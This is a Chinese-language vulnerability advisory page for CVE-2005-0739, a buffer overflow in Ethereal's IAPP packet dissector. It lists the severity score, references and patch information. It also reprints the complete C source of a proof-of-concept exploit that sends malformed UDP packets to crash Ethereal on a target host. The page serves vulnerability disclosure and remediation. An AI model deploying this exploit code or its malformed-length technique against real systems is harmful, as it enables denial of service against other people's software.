CVE-2005-0739
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:14:06
NMCOE    

[原文]The IAPP dissector (packet-iapp.c) for Ethereal 0.9.1 to 0.10.9 does not properly use certain routines for formatting strings, which could leave it vulnerable to buffer overflows, as demonstrated using modified length values that are not properly handled by the dissect_pdus and pduval_to_str functions.


[CNNVD]Ethereal IAPP解析器缓冲区溢出漏洞(CNNVD-200505-409)

        Ethereal 0.9.1至0.10.9版本的IAPP解析器不能为格式化字符串正确使用某些惯例,导致存在缓存区溢出漏洞。网络报文中的长度值可能覆盖静态的缓冲区。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-189 [数值错误]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9687The IAPP dissector (packet-iapp.c) for Ethereal 0.9.1 to 0.10.9 does not properly use certain routines for formatting strings, which could l...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0739
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0739
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-409
(官方数据源) CNNVD

- 其它链接及资源

http://anonsvn.ethereal.com/viewcvs/viewcvs.py?view=rev&rev=13707
(UNKNOWN)  MISC  http://anonsvn.ethereal.com/viewcvs/viewcvs.py?view=rev&rev=13707
http://marc.info/?l=bugtraq&m=111066805726551&w=2
(UNKNOWN)  BUGTRAQ  20050312 Ethereal remote buffer overflow #2
http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
(UNKNOWN)  MISC  http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
http://www.debian.org/security/2005/dsa-718
(PATCH)  DEBIAN  DSA-718
http://www.ethereal.com/appnotes/enpa-sa-00018.html
(PATCH)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00018.html
http://www.gentoo.org/security/en/glsa/glsa-200503-16.xml
(UNKNOWN)  GENTOO  GLSA-200503-16
http://www.mandriva.com/security/advisories?name=MDKSA-2005:053
(UNKNOWN)  MANDRAKE  MDKSA-2005:053
http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
(UNKNOWN)  FEDORA  FLSA-2006:152922
http://www.redhat.com/support/errata/RHSA-2005-306.html
(UNKNOWN)  REDHAT  RHSA-2005:306
http://www.securityfocus.com/bid/12762
(UNKNOWN)  BID  12762

- 漏洞信息

Ethereal IAPP解析器缓冲区溢出漏洞
中危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Ethereal 0.9.1至0.10.9版本的IAPP解析器不能为格式化字符串正确使用某些惯例,导致存在缓存区溢出漏洞。网络报文中的长度值可能覆盖静态的缓冲区。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.ethereal.com/download.html

- 漏洞信息 (874)

Ethereal <= 0.10.9 "3G-A11" Remote Buffer Overflow Exploit (2) (EDBID:874)
windows dos
2005-03-12 Verified
0 Leon Juranic
N/A [点击下载]
/*
 * 
 * Ethereal IAPP remote buffer overflow #2 PoC exploit 
 * ---------------------------------------------------
 * To test this vulnerability on windows, try to send 3-10 packets 
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 * 
 * Coded by Leon Juranic <ljuranic@lss.hr> 
 * LSS Security <http://security.lss.hr/en/>
 * 
 */ 

#include <stdio.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

#define IAPP_PDU_SSID 0

typedef struct _e_iapphdr {
        unsigned char ia_version;
        unsigned char ia_type;
} e_iapphdr;


typedef struct _e_pduhdr {
	unsigned char pdu_type;
	unsigned char pdu_len_h;
	unsigned char pdu_len_l;
} e_pduhdr;


void xp_sendpacket (char *pack)
{
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	int sock,i;
	struct sockaddr_in sin;
	unsigned char buf[2000];
	char bla[2000];
	e_iapphdr *iapp;
	e_pduhdr *pdu;

	wVersionRequested = MAKEWORD( 2, 2 );
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( err != 0 ) {
		printf ("error!!!\n");
		ExitProcess(-1);
	}

	sock=socket(AF_INET,SOCK_DGRAM,0);

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr = inet_addr(pack);
	sin.sin_port = htons(2313);

	iapp = (e_iapphdr*)&buf;
	iapp->ia_version = 1;
	iapp->ia_type = 1;
	
	pdu  = (e_pduhdr*)(buf+2);
	pdu->pdu_type = 3; 
	pdu->pdu_len_h = 0x05;    
	pdu->pdu_len_l = 0xa1;
	
	memset (bla,'\xfc',1300); 
	strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
	
//	for (i=0;i<1000;i++)
	sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));

}


main (int argc, char **argv)
{
	
	xp_sendpacket(argv[1]);
}

// milw0rm.com [2005-03-12]
		

- 漏洞信息

14667
Ethereal IAPP Dissector Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-11 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.10.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站